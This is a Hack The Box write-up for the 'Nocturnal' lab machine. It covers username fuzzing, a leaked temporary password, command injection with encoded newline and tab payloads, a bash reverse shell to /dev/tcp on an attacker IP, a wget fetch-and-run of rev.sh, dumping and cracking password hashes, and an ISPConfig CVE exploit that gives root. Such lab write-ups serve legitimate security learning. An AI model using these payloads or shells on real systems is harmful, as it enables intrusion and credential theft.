Nocturnal - Hack The Box Machine

May 2025

User Flag

Navigating through the website and intercepting some requests, I found the view.php file. This file was receiving a username in the query attributes, so I tried to view other people's files like admin and it didn't retrieve the error User not found but it simply returned the page with no files, which means that the user exists but has no files. Knowing this, I tried to fuzz some usernames with the rockyou wordlist:

ffuf -w ~/wordlists/passwords/rockyou.txt -u "http://nocturnal.htb/view.php?username=FUZZ&file=a.pdf" -H "Cookie: PHPSESSID=hva38rh98rll8q07g4k244f7j4"

With this fuzzing command, I was getting all the requests with 200 response code, so I filtered the requests by response size with the flag -fs 2985 and got some matches for usernames that had some files:

amanda                  [Status: 200, Size: 3355, Words: 1178, Lines: 129]
frank                   [Status: 200, Size: 3037, Words: 1174, Lines: 129]
tobias                  [Status: 200, Size: 3037, Words: 1174, Lines: 129]

The first user amanda, had a file called privacy.odt with this contents:

Dear Amanda,
Nocturnal has set the following temporary password for you: arHkG7HAI68X8s1J. This password has been set for all our services, so it is essential that you change it on your first login to ensure the security of your account and our infrastructure.
The file has been created and provided by Nocturnal's IT team. If you have any questions or need additional assistance during the password change process, please do not hesitate to contact us.
Remember that maintaining the security of your credentials is paramount to protecting your information and that of the company. We appreciate your prompt attention to this matter.

Yours sincerely,
Nocturnal's IT team

So we now know that the amanda user's password is arHkG7HAI68X8s1J and we can use it to login on the website.

This user is an admin on the website, so we now have access to the admin panel.

a%0abash%09-c%09"id"%0a

We get:

sh: 3: backups/backup_2025-05-01.zip: Permission denied
uid=33(www-data) gid=33(www-data) groups=33(www-data)

#!/bin/bash
bash -c 'bash -i >& /dev/tcp/10.10.16.88/4444 0>&1'

a%0abash%09-c%09"wget%09http://10.10.16.88:8888/rev.sh"%0a

a%0abash%09-c%09"bash%09rev.sh"%0a

www-data@nocturnal:~$ cd nocturnal_database
cd nocturnal_database
www-data@nocturnal:~/nocturnal_database$ ls
ls
nocturnal_database.db
www-data@nocturnal:~/nocturnal_database$ ls -la
ls -la
total 28
drwxr-xr-x 2 www-data  www-data   4096 May  1 11:41 .
drwxr-xr-x 6 ispconfig ispconfig  4096 Apr 14 09:26 ..
-rw-rw-r-- 1 www-data  www-data  20480 May  1 11:41 nocturnal_database.db
www-data@nocturnal:~/nocturnal_database$ sqlite3 nocturnal_database.db
sqlite3 nocturnal_database.db
.tables
uploads  users
select * from users;
1|admin|d725aeba143f575736b07e045d8ceebb
2|amanda|df8b20aa0c935023f99ea58358fb63c4
4|tobias|55c82b1ccd55ab219b3b109b07d5061d

Running a simple hashcat in the tobias user, we get:

55c82b1ccd55ab219b3b109b07d5061d:slowmotionapocalypse

With this password, we can ssh into the machine and get the first user flag.

Root flag

8080 port open...

ISPConfig software version 3.2 -> CVE-2023-46818

After multiple tries with crossing usernames and password, a login with admin and slowmotionapocalypse was successful.

Running the exploit with these credentials gives us a root shell that we can use to simply cat the contents of /root/root.txt and get the final flag.